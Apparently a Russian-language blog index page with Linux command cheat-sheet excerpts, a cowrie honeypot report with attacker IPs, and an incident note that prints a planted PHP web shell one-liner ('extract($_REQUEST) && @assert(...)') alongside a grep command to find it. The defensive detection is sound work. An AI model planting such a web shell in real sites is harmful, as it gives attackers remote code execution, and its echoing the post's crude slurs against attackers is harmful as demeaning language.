Linux Нужные команды чтоб не забыть часть 2

ХАЦКЕРЫ
Выставление/изменение полномочий на файлы

ls -lh — просмотр полномочий на файлы и директории в текущей директории
ls /tmp | pr -T5 -W$COLUMNS — вывести содержимое директории /tmp и разделить вывод на пять колонок
chmod ugo+rwx directory1 — добавить полномочия на директорию directory1 ugo(User Group Other)+rwx(Read Write eXecute) — всем полные права. Аналогичное можно сделать таким образом chmod 777 directory1
chmod go-rwx directory1 — отобрать у группы и всех остальных все полномочия на директорию directory1.
chown user1 file1 — назначить владельцем файла file1 пользователя user1
chown -R user1 directory1 — назначить рекурсивно владельцем директории directory1 пользователя user1
chgrp group1 file1 — сменить группу-владельца файла file1 на group1
chown user1:group1 file1 — сменить владельца и группу владельца файла file1
find / -perm -u+s — найти, начиная от корня, все файлы с выставленным SUID
chmod u+s /bin/binary_file — назначить SUID-бит файлу /bin/binary_file. Это даёт возможность любому пользователю запускать на выполнение файл с полномочиями владельца файла.
chmod u-s /bin/binary_file — снять SUID-бит с файла /bin/binary_file.
chmod g+s /home/public — назначить SGID-бит директории /home/public.
chmod g-s /home/public — снять SGID-бит с директории /home/public.
chmod o+t /home/public — назначить STIKY-бит директории /home/public. Позволяет удалять файлы только владельцам
chmod o-t /home/public — снять STIKY-бит с директории /home/public

Читать дальше

Linux Нужные команды чтоб не забыть часть 1

ХАЦКЕРЫ
Системная информация

arch
uname -m — отобразить архитектуру компьютера
uname -r — отобразить используемую версию ядра
dmidecode -q — показать аппаратные системные компоненты — (SMBIOS / DMI)
hdparm -i /dev/hda — вывести характеристики жесткого диска
hdparm -tT /dev/sda — протестировать производительность чтения данных с жесткого диска
cat /proc/cpuinfo — отобразить информацию о процессоре
cat /proc/interrupts — показать прерывания
cat /proc/meminfo — проверить использование памяти
cat /proc/swaps — показать файл(ы) подкачки
cat /proc/version — вывести версию ядра
cat /proc/net/dev — показать сетевые интерфейсы и статистику по ним
cat /proc/mounts — отобразить смонтированные файловые системы
lspci -tv — показать в виде дерева PCI устройства
lsusb -tv — показать в виде дерева USB устройства
date — вывести системную дату
cal 2007 — вывести таблицу-календарь 2007-го года
date 041217002007.00* — установить системные дату и время ММДДЧЧммГГГГ.СС (МесяцДеньЧасМинутыГод.Секунды)
clock -w — сохранить системное время в BIOS


Читать дальше

Linux Нужные команды Vbox и другие

ХАЦКЕРЫ
Перенос файлов по SSH
откуда куда
scp -rCvp -P 22 [email protected]:/mnt/backup/Test.vdi /mnt/backup/

rsync -avz -e "ssh -p 22" --progress --exclude='Deb.vdi' --exclude='zabbix.sql'  --exclude='mysql.tar.gz' [email protected]:/mnta/* /mnt4tb/


Простой перенос файлов из папки в папку
-----только для дебиана пример
sudo rsync -avh /mnr/boot/ /mnt/sdb1
sudo rsync -avh /mnr/ /mnt/sdb2

Читать дальше

Перенос Linux с одного диска на другой Debian 10

Blog by Mikro
Для переноса системы с диска на новый диск или ССД диск потребуется сделать несколько шагов.
После подключения нового диска к старой системе Linux на примере старенькой Debian 10 требуется:
  • Разметить и форматировать новый диск.
  • Перенести данные вместе с ОС.
  • Перейти через chroot в папку c перенесённой ОС.
  • Поменять fstab.
  • Установить загрузчик Grub.
  • готово.

Читать дальше

Водные знаки для JPG в Linux

Blog by Mikro
Потребовалось нанести на JPG и PNG файлы ватермарки.
Массовый поиск и нанесение с помощью комманды

ls -1 *.jpg | xargs -I'{}' convert {}  -fill white -box '#00770080' -gravity South -pointsize 20 -annotate +0+5 'radio.obninskiy.net' {}

ls -1 *.png | xargs -I'{}' convert {}  -fill white -box '#00770080' -gravity South -pointsize 20 -annotate +0+5 'radio.obninskiy.net' {}


а также можно поиск и замена по всем папкам


cd /вашш путь
find -name "*.jpg" -print0 | xargs ну и так далее

Mysql логи mysql-bin.000

Blog by Mikro
В линуксе постоянно забываю о настройке самого главного параметра для MYSQL сервера
а именно автоматического удаления лог фалов иначе сервер просто забьёт свободное место и вклинит.

что надо сделать
Читать дальше

Наивные ХАКЕРЫ или Тролим БОТНЕТ WANNAMINE

ХАЦКЕРЫ
haker pidor
На накенец-то дошли руки до того чтобы посмотреть зачем хакерам доступ к терминалу SSH и Telnet.
Запускаем на серваке ФЭЙКОВЫЙ терминал cowrie, даём кулхакеру подобрать пароль напимер admin и пароль Qwerty!
Ржом!
Большинство уродБотНетов делают одно и тоже.
Входят,
62.93.166.91] login attempt [b'nproc'/b'nproc'] succeeded

Узнают тип процессора
62.93.166.91] executing command «b'cat /proc/cpuinfo | grep name | wc -l'»
62.93.166.91] Command found: cat /proc/cpuinfo

ну и уходят.

Но попался наконец-то кулхацкер… айпишник этого говноря 58.240.92.50! Ещё и китайский конечно же.

Читать дальше

массово удаляю метаданные JPG в Linux

WEB
JPG методанные Exif это

палево

. Значит отовсюду ищем и трём.
Ставим пакет ImageMagick
топаем в нужную папрку cd /home/srv например и бомбим
find -name "*.jpg" -print0 | xargs -0 mogrify -strip
или если это в одной папке и их мало
ls -1 *.jpg | xargs -0 mogrify -strip

И тоже самое для регистра JPG

Старая уязвимость assert(stripslashes

WEB
В старом движке Livestreet нашёл давнюю уязвимость которая откуда-то взялаь и очень давно лежала в папке cache.
Но какой-то злоумышленник умудрился ей воспользоваться!
Выглядит как обычный php файл с содержанием типа

<?php extract($_REQUEST) && @assert(stripslashes($not)) && exit;


для поиска остальных фалов с подобным кодом использую команду
grep -r "assert(stripslashes" /srv/www/


Кстати из-за этой уязвимости начали находиться ЭЛЬФЫ (ELF).
В памяти сидят то удаляем их и снимаем процесс